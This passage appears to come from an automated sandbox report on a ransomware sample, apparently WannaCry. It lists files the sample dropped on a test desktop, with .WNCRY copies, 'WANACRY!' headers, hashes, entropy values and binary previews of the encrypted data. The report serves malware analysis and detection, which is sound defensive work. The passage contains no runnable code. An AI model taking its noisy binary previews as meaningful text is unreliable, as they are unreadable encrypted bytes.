                                Preview:../.H..#v.:E`0.F..>.Jq..7.4W..-Y....y......+h..^.......g.......2J.G0...]Ih.I....:.`OX....y.J.F....B..R..x..B.Fi...Y.N.0O.=..0....D..#...)...,.?5.:r..Q.;..... s-9.dPz......O........W..........H=.{........p.<l.e..dI.x..n.d. yS..tA....<n.UZ3.s.....E..B...f...C&.....q`.Y...b..........k...?..CK..b..QJ..'c:,...&..H"...............;+i.....s.1.Z.0.0....h.n"G'.E..3..a..tRM....._e1h.s..6.^...k1.D..=.e..}D........T.3..k.t+%>B...|\.......Z.N...!..NF...t.N....X....v...1.......<G.....'....c.h./(.nau...n.C.n.......$.k..p.Cq...rW..U.|..=MIe...6r..../..6.,.fg}...y.4#.{v.{.a...9..-`...s...e._^Z8n.`..k..C..H.r...i.=C...'........u....q".....]..j...x..P....$...V..T.&..!.....xSi.......x.u...o3M..A..D!.Q.......k.M....$n<...UK..._..q@k.....F4.c..=.Yl`."6.../9)...#qnUJ/.'{z.....>..\..p.`...KM...p...'...1*(<...'.`.....Nt.q.n.k1...u..C..q....B..?.N....K../.\...mqS.}4.5/S..qB.L.....>jl.....&...M....,.P.Vw.JX...O.k.Td5.gB.^.. Q...W..76)...2....'.I.@.{q}7.......

                                C:\Users\user\Desktop\SQSJKEBWDT\EFOYFBOLXA.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839359993793439
                                Encrypted:false
                                SSDEEP:24:bkzvCmrjWuzuYlY2b4WDf8JQnxm64NPGnFYN13MVFLxoV9SxSKYJ7wWrG4/:bkrC4yuzDlY843JQxH4dGOvGLcSxIwWZ
                                MD5:48A4E9DD54C67021E7C0D7A68B715840
                                SHA1:C55AB9A2CD92A6B3D7A6C0C469230921E68748C3
                                SHA-256:80AE052C737359EF2E7657E64CACC3A46D0B245DD39577B13060095E6E3CDD60
                                SHA-512:CA5D223C3777C07561CC3E3D148CFF38F09BE211498B9BFD5E4BB3CF5182B327DDAE1951AB82A136A9071AA53A23E960A30D89D719E3872F26A970DD9BB3B9B1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....g|HH...V...ms5.h .r}.....g....'.y.Q...U...!.Ra(..Bwe..w.....?<]...{|b...u8@..(....$..............s...z..b.2...SA.<f.6..RV...H...V.3....M=..:..y.;.{. ,.\.m......x....C.N.AY...%....C......lN......x.....b.L6..n.f.m...r`..d.N.lx..u...s..nTS........$............V....!....&T.g#o..MR.J7T...z'"1&.;..@.C..ZF.C....Zw8...$....$c"g..x......).r...n......JY.'.........J..}/.;........".94........R..V$..\...o...'.SW..=.......u.*.^....#(h....v.....$..z..Q.[....O...{..n......O..,.%9t.....#.r....U.T..;.}...<#..:....p.?.3..WP...{...|9<....+6..8.;....Q....v.2. ..^q......A'....]..... ..(..X.H7..'..}-...Z..M.......Y.......w.+s..to..pQ.|S._.....+...U/.}C4...c1}[..h..)b..........1.3..@.X[#..{.P....,Z...^..H.........0#\y.w.|..o.r.....z.hD.s.a..R.I0a...s...%g..#..u...T.r..q.W......L.'..t..E......0\f@...f...l.D..t....QT.L.....@I.vb.1.e.0.&....Xe-AE.$.M].:.-.....0.m\Xi......e.v....'j`....Y7x.....e.<.k.`.-N.C.2N..8.."#....=Yb..J..Uj{...6..k.....(....|...W..g.8].

                                C:\Users\user\Desktop\SQSJKEBWDT\EFOYFBOLXA.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839359993793439
                                Encrypted:false
                                SSDEEP:24:bkzvCmrjWuzuYlY2b4WDf8JQnxm64NPGnFYN13MVFLxoV9SxSKYJ7wWrG4/:bkrC4yuzDlY843JQxH4dGOvGLcSxIwWZ
                                MD5:48A4E9DD54C67021E7C0D7A68B715840
                                SHA1:C55AB9A2CD92A6B3D7A6C0C469230921E68748C3
                                SHA-256:80AE052C737359EF2E7657E64CACC3A46D0B245DD39577B13060095E6E3CDD60
                                SHA-512:CA5D223C3777C07561CC3E3D148CFF38F09BE211498B9BFD5E4BB3CF5182B327DDAE1951AB82A136A9071AA53A23E960A30D89D719E3872F26A970DD9BB3B9B1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....g|HH...V...ms5.h .r}.....g....'.y.Q...U...!.Ra(..Bwe..w.....?<]...{|b...u8@..(....$..............s...z..b.2...SA.<f.6..RV...H...V.3....M=..:..y.;.{. ,.\.m......x....C.N.AY...%....C......lN......x.....b.L6..n.f.m...r`..d.N.lx..u...s..nTS........$............V....!....&T.g#o..MR.J7T...z'"1&.;..@.C..ZF.C....Zw8...$....$c"g..x......).r...n......JY.'.........J..}/.;........".94........R..V$..\...o...'.SW..=.......u.*.^....#(h....v.....$..z..Q.[....O...{..n......O..,.%9t.....#.r....U.T..;.}...<#..:....p.?.3..WP...{...|9<....+6..8.;....Q....v.2. ..^q......A'....]..... ..(..X.H7..'..}-...Z..M.......Y.......w.+s..to..pQ.|S._.....+...U/.}C4...c1}[..h..)b..........1.3..@.X[#..{.P....,Z...^..H.........0#\y.w.|..o.r.....z.hD.s.a..R.I0a...s...%g..#..u...T.r..q.W......L.'..t..E......0\f@...f...l.D..t....QT.L.....@I.vb.1.e.0.&....Xe-AE.$.M].:.-.....0.m\Xi......e.v....'j`....Y7x.....e.<.k.`.-N.C.2N..8.."#....=Yb..J..Uj{...6..k.....(....|...W..g.8].

                                C:\Users\user\Desktop\SQSJKEBWDT\GIGIYTFFYT.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.813557426328387
                                Encrypted:false
                                SSDEEP:24:H1SQU2lKhKYz575uZTzdtYkeXFL3jiqBkrVS:H1SQU2l0KYz5stzvBy9184
                                MD5:D2D36C971D3B8F559DEC6B2ECCBD0076
                                SHA1:C6F5E5C674BC3DEB20E788C476BAB9DF23E12080
                                SHA-256:8173A49907225F5D34F233F0C84ACD10195A1FDAD318E4E7365C0343D2627FF7
                                SHA-512:850686B68ACE86F35D041065F222FCD8EB31EF39865E22D185FDB9102AA086C76E38C32C9FBB35A4D04BE10CE6018B1AB39091D8B5D5F8DBD8272F458E4E9EC2
                                Malicious:false
                                Reputation:unknown
                                Preview:._..j..J..R.}..4...K.k."[@O.h...f..>....X.......4.. y.<..X.A..N{Y.9..8.a2@...E..x...ZEW..s.4..M09M.....Q......;~"5.U.A....L...v.H..#MTO.3.t....&..O3:...c....fo).Is.>...(.l.:8...@._....J.$.../:n.0S.q.-Z'_....!?(.+4m.mH.......Oy..3......\..7i`.....E..o.......]X..P.J=.|9.m......s...|.:..R....<.M....G..L...G.....Y...K3._6.j.}?...CX..gs.sc.H.m......g...6...;..x...02..g.......U.-......}fQ...E.F.;b.E.M.......h.y.....R$$..!4..l....uz...G....."@P.t.]..'. ...Z{..zG..(QA.|..-...>).yd.....Ail.*.....N...MV..........._.H.Vo.a.e...4..\.P.J.j9..S(.[.j..Y..4S...#.z{H..#...c..I..................E`;.........@...!W.....'J>j.......".O.^.w.h...f!.>u..}_.W7JZ.......p^."{.w.*...DD.:OV..C........a..7v.X..nd^..zS...#..m......4..../qu...k.....;8..?l7....^};m.^K.<....c*%.[.u.+.p.b..2#(O.[..&.,.}......tH.I..O..!.c..N.F)....q1H{....._>{.a}...r.3.4..+l..%.0.5D...1.IMD.3..;.|..K....X.-4.=a...N..o.H).c..R.)..?..Ap.k......l.,d.x.p....4.o.A...%=.i.)..Lh.t4S.u6...HE.?..+c.)

                                C:\Users\user\Desktop\SQSJKEBWDT\GIGIYTFFYT.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854305026526188
                                Encrypted:false
                                SSDEEP:24:bkeFa9Dw6b/h9gtdfL6XwT/43/mYDjtJX8iz3NHlfIGhpWbC9BbGFm0HFblBo4LX:bkZA/6Y4/NVJX8gHllWb8BAv
                                MD5:D1D542B35EA12D2355B75F9CE3DEBBDB
                                SHA1:1CE0BA937D3BA2588482DC0A71891282AEABC1D9
                                SHA-256:FE4143971E95A209F7AC0E507EE71D0E818DBF7D3432CCB15FE1024C8EDFD7AD
                                SHA-512:74CA5C9504C2FD17A214F48296DCD6C4EE42651073CA3E098E55B55D0706555A60262633340AD2D93E3438032ADB1D6C774DF71FE309802F0258C45A47136289
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....=..|..9C.=...v.Z7..7.D../\.`P..>.5{gG..+....'2...lk+v.../\..nI/P2../.....Ud..}.<..|.Y.If..dY..Y.s..]x..8!..Hc(.M# ....[v.P....$a....>l{../.'...^$.n9.....J.>.....]..&.{kp.M.AaWE..-].Y...S$...aP../].._..6..".q......pS.Q...cy.2.....\,..+..Y.%<.)..@N..t'............. h..#Nhc.....U,._........D...pWE6.9N.D[..|TF..O.y...c.t.I.%.....F.H..kz..R,2..b.Jz.o.{xj_-..h.Qz..^j[.r.Oj..(.i..........'f.E.aY.E.X.....b....TS..J...=H..p..:.[......fv'#]^.........n\Bg.....H!...z..1...*.d>..I..go.........S.D....g.u.._tZ......5-.T.B...0a.....k4.j.....^..._s.o0~....x....^.:..<..........*..;% $........z.....f.s...%"..G.\..T...vu..v+..C..o.Y.1n..G......7......V..m.2.l;.p...M..5?..!...i.s.9...*........R....N........v.E..:.B.\."Y.x%6...E..@..`mc..O..'v...h.V.$.)'...|...\p..s.-LI^h.1.(8L.!1.....!....:.K..N.;..k&......C..u...i.d.Z.J.B@...8..>.f../.....;.zr.IW..Ul.0.}/......JH.[..>..h.....Y.....8..r.G..M...V.X..2......Y....(Bd{....t:.oK......~i.l..b...K._^.d.E5].9M.

                                C:\Users\user\Desktop\SQSJKEBWDT\GIGIYTFFYT.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854305026526188
                                Encrypted:false
                                SSDEEP:24:bkeFa9Dw6b/h9gtdfL6XwT/43/mYDjtJX8iz3NHlfIGhpWbC9BbGFm0HFblBo4LX:bkZA/6Y4/NVJX8gHllWb8BAv
                                MD5:D1D542B35EA12D2355B75F9CE3DEBBDB
                                SHA1:1CE0BA937D3BA2588482DC0A71891282AEABC1D9
                                SHA-256:FE4143971E95A209F7AC0E507EE71D0E818DBF7D3432CCB15FE1024C8EDFD7AD
                                SHA-512:74CA5C9504C2FD17A214F48296DCD6C4EE42651073CA3E098E55B55D0706555A60262633340AD2D93E3438032ADB1D6C774DF71FE309802F0258C45A47136289
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....=..|..9C.=...v.Z7..7.D../\.`P..>.5{gG..+....'2...lk+v.../\..nI/P2../.....Ud..}.<..|.Y.If..dY..Y.s..]x..8!..Hc(.M# ....[v.P....$a....>l{../.'...^$.n9.....J.>.....]..&.{kp.M.AaWE..-].Y...S$...aP../].._..6..".q......pS.Q...cy.2.....\,..+..Y.%<.)..@N..t'............. h..#Nhc.....U,._........D...pWE6.9N.D[..|TF..O.y...c.t.I.%.....F.H..kz..R,2..b.Jz.o.{xj_-..h.Qz..^j[.r.Oj..(.i..........'f.E.aY.E.X.....b....TS..J...=H..p..:.[......fv'#]^.........n\Bg.....H!...z..1...*.d>..I..go.........S.D....g.u.._tZ......5-.T.B...0a.....k4.j.....^..._s.o0~....x....^.:..<..........*..;% $........z.....f.s...%"..G.\..T...vu..v+..C..o.Y.1n..G......7......V..m.2.l;.p...M..5?..!...i.s.9...*........R....N........v.E..:.B.\."Y.x%6...E..@..`mc..O..'v...h.V.$.)'...|...\p..s.-LI^h.1.(8L.!1.....!....:.K..N.;..k&......C..u...i.d.Z.J.B@...8..>.f../.....;.zr.IW..Ul.0.}/......JH.[..>..h.....Y.....8..r.G..M...V.X..2......Y....(Bd{....t:.oK......~i.l..b...K._^.d.E5].9M.

                                C:\Users\user\Desktop\SQSJKEBWDT\JDDHMPCDUJ.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.820497177347472
                                Encrypted:false
                                SSDEEP:24:Auzxri7UdDOds48v6690d1TMMAomuk94hp/BrSqv:AgxcUdDOds48v6H1QMAak94hp/sk
                                MD5:E26B4BE7CDC6F8B85DC2F594A4504D3E
                                SHA1:8146317FC26D09C9A6B38BD4A7EE71D7CDD7BDB6
                                SHA-256:15B1BF1FC57F53094DB35509DB8EFDEC15A61C11D8A914118317A36B08DA8E8E
                                SHA-512:CC75E1F4B5B1179690F452DEFEAF7950B52CDC61DF10F619BB2A9095469EDB6DE6F993046756AC77DB0446CBAE70ACB2DC96572EFEB39DC17EEF1F9EC5E16BC9
                                Malicious:true
                                Reputation:unknown
                                Preview:.S).#......=.~...Q9L#u..........p.\....._.K...KA..=...C'.W.D...VEdx.A.*7.G....%..4f....3..Q..Bo..x3%.,....A.Q.hc|..W....r0P..O....M.....%8;1..7-..Nx..........+&:..yc... ....'X.'..3.F?U..........]@8....:.v...5=]..H.....,*b....z..&.>..\./.{..{c....[b.p....D....J!. ..l..".....~7M..kcI..........1-qQ...m.*..v...{M._.....G30.7Z..`...ul.Wr..v..W-.......Z.....<tl..{..{.W.[1.b$O.....I.1R........mO'.....:q..A.W..+.....+..W.. .V."..Vx./.gV....j...X...F....J..*..~jq.WH....e...W.""h./Y....n...&...,....x.d...|...4d|e.....BM.ao)[.%.....%.......Q...FJijE.W...\..&.,J..;...4.....Y\b].>).c..a..P....!Z.!..0bnW..g."P...~...x...=.CB....c.t5.JY..9...'B4.4.%..@"..*..~%,.....;...,+M.....m..........gu(..l...w..KV.G..c....=)r._`....{.5TK19...}c....]{....M].....a......t......_....p.+.z...N...,.$ij...TF..U.^.AZ.._..M.%.....)..T...]o..^w..QL.N...P..q.V..2L....r.6"...`j.k.YY..uPX9a^..U,...D}a..rR.;...(.>..&Y..^.+...S......J..a.x.<a.[..u.:......H.w..eC...|.....g

                                C:\Users\user\Desktop\SQSJKEBWDT\JDDHMPCDUJ.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.849833813047626
                                Encrypted:false
                                SSDEEP:24:bk49pFiB/UH9Z4zMW4Zh2FC0QIv3VaSb9RsYpEOH7Wr3eOJPNJT:bkpcbmM32FvflNREOH71OJFx
                                MD5:898C716AB426298E8663BDBAE1FCF006
                                SHA1:820A7F0EB70E948C06A6956BFFE9A7F4C2AAC660
                                SHA-256:D3657FD636373561753C1CFEB4EEF9FDC704A8EAEACB457109461C751B3E0C59
                                SHA-512:BD38AB10E23C4C6EE7EA408343466D0310F9E4CDD8EB1890EFFA840EA543E6994B4E7161E8F0180A1273DC94FAB884768775DCB42251C7DBD61E9B27F2B4542F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........=.L!F......A..VC.;_....2...|_MK.Z."as.......u+..C..-.F.#............t.q.9..M."./i.......f.;.*..s"a....t.I)..O....O..#2S..`w..........}.m...TZk.7...T. ...Az..V....Y.2],..L..W%..%...b.......B...RI.;.N..L........c.0._.i.@..!..v...we.jZ.,G...A6=....................;h..[.a..B.\.{...Ac.b..3.E..>....S..r.2AC.VZ....o....&{. .0\.....(.....b..j....z...B..rRh6.\%b:.id..v.#......b.~`.,a....A..^A..Js.3....qp..F.m`.Io.%..#.G.M..>p]85).+.3{...<.....#.........a^y..eL:.pO.*g P...w.F..i'5..:9S5.FD.../?.t.'..x....dn..KU...P..Zv._DR...~..L6R..=v.......}..pn..N.T1n....}._..H..m.Y.U^%.s..j...... .......eG.5,.&_..z...*z.5l.~.M.F].32.#..{.*...C.c..Q.V#......q..1i.....|\&.m.D.mH.MB\....o..].hj.:...^0.{...Ia.KT.....#.IcQ. x...(...6.B...*%.....MCg)^6Ar(|.. )>..y...}C.x<..!k..:....l.....9.^.!"^YY8P*......_.+....v.f...J;7wA.......=....O.L.f.....\.".G#<..>.r......[.M..F....z{.1..T.7....DT..X9...1...6..O8.=.6Og3u-`&...yY.IbOx...w.@..M...XJ9j."EW.h*X.-....E.."6

                                C:\Users\user\Desktop\SQSJKEBWDT\JDDHMPCDUJ.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.849833813047626
                                Encrypted:false
                                SSDEEP:24:bk49pFiB/UH9Z4zMW4Zh2FC0QIv3VaSb9RsYpEOH7Wr3eOJPNJT:bkpcbmM32FvflNREOH71OJFx
                                MD5:898C716AB426298E8663BDBAE1FCF006
                                SHA1:820A7F0EB70E948C06A6956BFFE9A7F4C2AAC660
                                SHA-256:D3657FD636373561753C1CFEB4EEF9FDC704A8EAEACB457109461C751B3E0C59
                                SHA-512:BD38AB10E23C4C6EE7EA408343466D0310F9E4CDD8EB1890EFFA840EA543E6994B4E7161E8F0180A1273DC94FAB884768775DCB42251C7DBD61E9B27F2B4542F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........=.L!F......A..VC.;_....2...|_MK.Z."as.......u+..C..-.F.#............t.q.9..M."./i.......f.;.*..s"a....t.I)..O....O..#2S..`w..........}.m...TZk.7...T. ...Az..V....Y.2],..L..W%..%...b.......B...RI.;.N..L........c.0._.i.@..!..v...we.jZ.,G...A6=....................;h..[.a..B.\.{...Ac.b..3.E..>....S..r.2AC.VZ....o....&{. .0\.....(.....b..j....z...B..rRh6.\%b:.id..v.#......b.~`.,a....A..^A..Js.3....qp..F.m`.Io.%..#.G.M..>p]85).+.3{...<.....#.........a^y..eL:.pO.*g P...w.F..i'5..:9S5.FD.../?.t.'..x....dn..KU...P..Zv._DR...~..L6R..=v.......}..pn..N.T1n....}._..H..m.Y.U^%.s..j...... .......eG.5,.&_..z...*z.5l.~.M.F].32.#..{.*...C.c..Q.V#......q..1i.....|\&.m.D.mH.MB\....o..].hj.:...^0.{...Ia.KT.....#.IcQ. x...(...6.B...*%.....MCg)^6Ar(|.. )>..y...}C.x<..!k..:....l.....9.^.!"^YY8P*......_.+....v.f...J;7wA.......=....O.L.f.....\.".G#<..>.r......[.M..F....z{.1..T.7....DT..X9...1...6..O8.=.6Og3u-`&...yY.IbOx...w.@..M...XJ9j."EW.h*X.-....E.."6

                                C:\Users\user\Desktop\SQSJKEBWDT\PALRGUCVEH.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.849331355157396
                                Encrypted:false
                                SSDEEP:24:+ONb8+I9F2M3WJ2nldsICgnCM9ldUqLkgG:Zg+Ij2APnltCgdlWqu
                                MD5:7E96A9ECBD0492B3F17C3C370200EA99
                                SHA1:73A4447F4658926683A3F3D400F469E0E9284743
                                SHA-256:CD5EC38893D1FD1EF610DFF239578695240732787CC4590B4AA157B9198F0065
                                SHA-512:8DC961B21DEF4B5EDDAC174B632991757641D073B6094DB4892254B4D8B25289E13F77A85EFF61F34587BADCEE5138F1FAA8A00B9E827A40C5FA0C201EFC7E46
                                Malicious:false
                                Reputation:unknown
                                Preview:.!..]........9..I.w.k..hA.2y.K....yrb...)..)..j..r..x...9..].lQ..(.,....IR..vi..7..g................6...19}z...._g.T..xEO`.e.T......&......VB.....)....J.k.x9..jR.Lp.t.V."N....h.Gk.pv.,...+.*n...b.T|*.}...t%...p.....Z.._.s..I......R\Z..<G...m..!...1n.-B.0...e..._r6HH.............{.s........A>A...=8.!......9.L..,u.0..LV).f..'.+#BK.T....'t!i...O...C.. ..f.Z..z.r.(...(m...>.&...(......`..T.c...i.E..R.D[.V.!.&>....q_....-,..y..YV 'g..km:.'O.c=&..-...%.Dw_Y:...."..?.6.....t.....;....(.!.CD..!.|s\.oag.rE..k..CL......q..n..D{.).;B.#.......).......L|U.Lh7...[.1......%X.7.e.Z...d.l...x#:5...Qv[Tu.........)q.]v.)_.jv.....n.<J...p.wb.PK...K....6...1... .....mO..6...E. .....S.....~...._.yz...../...2-.r.....Ld..i..?..{xq.!...L...A.Zo.8...`)..y...v...e...&..@.%5.....@6.Vd%......c..0=.7.....E'.D.:.....J..Z.(*..$...9g..c.S..V..jN.F.......i3..W...Yd.S=..f0.. F7..-.@....^.xu.3...lJVHv..mRL.Y........d.W...S...a.u.uAf.......j.......>j2A~F_..8..D/...

                                C:\Users\user\Desktop\SQSJKEBWDT\PALRGUCVEH.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846435683559001
                                Encrypted:false
                                SSDEEP:24:bk473hMznzq6daJjjalmRfFFIy0qglGXVUuQA5712:bk473hIzZdahjzjIQTSPc7k
                                MD5:E1CD88C3DBA88574779E4142AC7D32BE
                                SHA1:507AC95784B847D965F67CDF476ABBC42CB976D3
                                SHA-256:C50BA49EAF331C8043D20B0DE42932F022634CA5454412AD7682746C3712BBB9
                                SHA-512:B711F3C31ACD05B988B32AF9CB4F07AB09AFA1A193A8EF373C8953D0495EFA8225C5CF0ED3ACAB8172075E23CD9DFB7A5A514ED7F56E01747504CF13922FDBD3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......N."......q....G.....0.C.Q.M..{...<.T..).b..L.F*G....-n.t....J.3.2..T.\u....&T..;6...q.g..' e.B.....%....5..e,A.\..=.?........\..*7L.(.kT...=.L.....S..P..Kr3_.:^.`..cj( M..%.$...F...X..D..av.....x....B;.Xk.+....A.S%Au6...b...$..."....)%\c....<...............@{..."CW_.V'......}!.i.A}_..\.........6BgT.J3.....c+.v+.xK..8.x.kZ.L....k.EMFR..4.:"H.@...........^.BR..7{.T!}qL.K.c.Y.;.0....`.......on.Xz ....\.}.r"n....p..fo..VM...t............N/m8.,.1.V..p.. LT[4f.aP.b"....q...qr.C.B.2..Q...>..twaje:......Q.'|.R.?....uT.^.I.........w.=..~\....5b.\......M/.e..*xc.. ..L.WnH/t...Oo.:G.F.<.Z..%..CI%.Q~%"Q.t6......\.^.&fM...[.S.....W..$m...~+.......F.i.i.~......y.@f7FRa..I.'3.6J..$..azf.%.j.Z G7/y..|...hB..4o..X&........x.ah..h'+g.2..r...j.....E......p........F..<...Dd..f5V@..am.........PzV3..o.|.Z..Mf...6....3v...0Hk..hz...~....f`]n......8r._.n.?J...3.H....5p..p..@..#.....Lp..D....).....Q..l.A,.N..-S........S.21..g.v..z4.o.....*.P".-F.e5Z>4Hi...A>.

                                C:\Users\user\Desktop\SQSJKEBWDT\PALRGUCVEH.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846435683559001
                                Encrypted:false
                                SSDEEP:24:bk473hMznzq6daJjjalmRfFFIy0qglGXVUuQA5712:bk473hIzZdahjzjIQTSPc7k
                                MD5:E1CD88C3DBA88574779E4142AC7D32BE
                                SHA1:507AC95784B847D965F67CDF476ABBC42CB976D3
                                SHA-256:C50BA49EAF331C8043D20B0DE42932F022634CA5454412AD7682746C3712BBB9
                                SHA-512:B711F3C31ACD05B988B32AF9CB4F07AB09AFA1A193A8EF373C8953D0495EFA8225C5CF0ED3ACAB8172075E23CD9DFB7A5A514ED7F56E01747504CF13922FDBD3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......N."......q....G.....0.C.Q.M..{...<.T..).b..L.F*G....-n.t....J.3.2..T.\u....&T..;6...q.g..' e.B.....%....5..e,A.\..=.?........\..*7L.(.kT...=.L.....S..P..Kr3_.:^.`..cj( M..%.$...F...X..D..av.....x....B;.Xk.+....A.S%Au6...b...$..."....)%\c....<...............@{..."CW_.V'......}!.i.A}_..\.........6BgT.J3.....c+.v+.xK..8.x.kZ.L....k.EMFR..4.:"H.@...........^.BR..7{.T!}qL.K.c.Y.;.0....`.......on.Xz ....\.}.r"n....p..fo..VM...t............N/m8.,.1.V..p.. LT[4f.aP.b"....q...qr.C.B.2..Q...>..twaje:......Q.'|.R.?....uT.^.I.........w.=..~\....5b.\......M/.e..*xc.. ..L.WnH/t...Oo.:G.F.<.Z..%..CI%.Q~%"Q.t6......\.^.&fM...[.S.....W..$m...~+.......F.i.i.~......y.@f7FRa..I.'3.6J..$..azf.%.j.Z G7/y..|...hB..4o..X&........x.ah..h'+g.2..r...j.....E......p........F..<...Dd..f5V@..am.........PzV3..o.|.Z..Mf...6....3v...0Hk..hz...~....f`]n......8r._.n.?J...3.H....5p..p..@..#.....Lp..D....).....Q..l.A,.N..-S........S.21..g.v..z4.o.....*.P".-F.e5Z>4Hi...A>.

                                C:\Users\user\Desktop\SQSJKEBWDT\SQSJKEBWDT.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.812109057982506
                                Encrypted:false
                                SSDEEP:24:2PxsNWsd1S+yNQzCEcN6rY8drTxSfdS0UNQpEXpletu5fsgShn:yJ85cUrfBx3hXpB5fsgShn
                                MD5:745253C547AF98E89DED34EBDC226E1C
                                SHA1:F035B26A5A15585B3AB42961A70505710514CB08
                                SHA-256:0DFBCF28FD41281C0DCDA342E2AB82D4192A5C7744EA84FECB540F210DA74646
                                SHA-512:27141D36F5130E5D723D5CE78374F92BA1A4A7A26B2570F06E7444E1D78004031B39A94F365E9D14AF67A9A5141F5C9929A325601A569446F51F69A6F4C62ACC
                                Malicious:true
                                Reputation:unknown
                                Preview:..D...?(....../.q.Ut..V.m....%.D..i.3.[/....X.+.#.....P.c.2..",.A#..n.....".*QL..DG....\Q.h_.A...{D.....k2.V..m'......N.B.pO...S/u.ee"...z.h|w.B.......0..~\....!....E..~.qJ....;.v......(.. '..eAnt8...tC.-.b-.....".....F.I.....s.....B.P .....f..'R.....E|..9.9.y.S.j.eo..8[W..T.D\.E.....<K.~\....pq.<q..!.Y.....s.;j.3}Fyu.@8..s@.{^.;...[.c...."B.......rX...r.B.@.c..6T..,+.L...L$N.......7....Kq.`,.{.z./.I@......|.f.L...k.`.#....YT.m...b..r.L...;..n.Y...^..$.='.N....z.A....>u.~+'.;!..6.....d..R0......a..%...R..9.....'...^.gX.e....cY....w.@...F..}.[...m....90F.'..$%;.n..=.Vz....}.....wen.V....3i..F.=....NC....k..<..~e....{..[....d...^.Z7..#..:.'..(.#.....m..1..].-XZ.e*.@....n..).&-Np..WU.....Z.uiM.p.O.i....be.J.....u\;.!#....9..6`->.O..&zux`.s...d.}..t2j .p..v.E.....U..-.;l....-..,..,...c.Z.....`...2...G[.`...K..T.r....^..^....."...~....[#Ua..........r.n."..<H.....e...*...M..B..A.....%..D.|}..]g.8......i..z..x.c..B..h...8.9...'....Uk....J[.-

                                C:\Users\user\Desktop\SQSJKEBWDT\SQSJKEBWDT.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.826072455901225
                                Encrypted:false
                                SSDEEP:24:bkmH6jTHspl6ds+CSWK+xIF9BoJel8HvMQhl3ezPQL8ItgcaMf0V0Io8rrOIHvDj:bkG6Xa4dsyWZI/Bd8PWPQ7XfBv8r/bnj
                                MD5:4C9A9916D29AD69E2CDE3B539C47A238
                                SHA1:7D1E07081673BB3BA0BBC9E36FC8085E4FE5D2CA
                                SHA-256:8B0C4FE2AD5A1FBDCD1905B43ADC2EBCBFC09AA5691E56FDDF4F50C5BD37C1BE
                                SHA-512:06F0D1690EED4BC5745862416124AAF95FDFEA1326662BC6BCFFC55743FE1FFA7FB55E7CCBD1813577E2645F84B0E470C43945263091B69B5B39A640719A9BE1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....q.z;......W.d|&..&../.nc..K-9..\...f.$.G...P.O.A.}.6&@.v=.vs.$]....2.UC.fm.>.5..L..#......h.....'.....j.).RAI.o..0..V`.......-...,............;T.. ...s.m-V4.._&.['..$.A.#'...E(3..........c.)_w.g...Y........5G.}.q....5b.\M.i.. ........lP.D..............D.SK..^.&.o#M.yh;#Y1......r.e..k...._..C#..G.6,.>6.BrU.._J.........+.%C.L.$>\.<.+...>r.....6......d#....4.Ku...Jg.x...^.<.b..z3..L..E....q.mr....L..W..zF.8z.l!J.a_.g..EP.....{...;...Bq.h...hN..$.[.... k<.T.}B.;^%.0F..w. G..I.|&.hOo...$..D..o.c......m.rbTm..0...?.~......<...?T.X..l.kQ..A..yD[@..(D....!.....+...@._.b..se.......o.o9;A....1...(.....P.o.J.e.._..\.......... (H.7)....~l...V...f.E..3E....s.}..2.{...^....@..~P..5....D..-.b!......lo.d._M..a..I...lfn..z..A.O".I...M.....-}k.e}...in...6..u?...B......[.~/n.f......q+...."..#P.n...P...4)_.q....bl...L.7}e.Ac"..,.5v.eJ.K4Z|i....!.9l......>....Yu........JGO./....C..x.N.0..V......7...!..}eX..M.P7....G...n...3.I..H.m..v!..

                                C:\Users\user\Desktop\SQSJKEBWDT\SQSJKEBWDT.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.826072455901225
                                Encrypted:false
